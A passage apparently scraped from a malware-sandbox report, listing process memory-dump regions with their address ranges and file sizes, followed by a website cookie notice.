                                                                                                                                                                                                                                                                                                                                                                                                          944KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3840-39-0x0000000005420000-0x00000000054B2000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3840-47-0x0000000005380000-0x00000000053E6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          408KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3840-38-0x0000000005840000-0x0000000005DE6000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/3840-52-0x00000000066D0000-0x000000000676C000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          624KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-43-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-49-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-44-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-18-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-92-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/4856-91-0x00007FF757880000-0x00007FF758057000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          7.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5416-0-0x00007FFC34EA3000-0x00007FFC34EA5000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          8KB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5416-34-0x00007FFC34EA0000-0x00007FFC35962000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5416-2-0x00007FFC34EA0000-0x00007FFC35962000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          10.8MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5416-1-0x00000000002F0000-0x000000000068E000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          3.6MB

                                                                                                                                                                                                                                                                                                                                                                                                        • memory/5604-89-0x0000000007100000-0x000000000710A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                                                                                                                                                                                                        We care about your privacy.

                                                                                                                                                                                                                                                                                                                                                                                                        This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.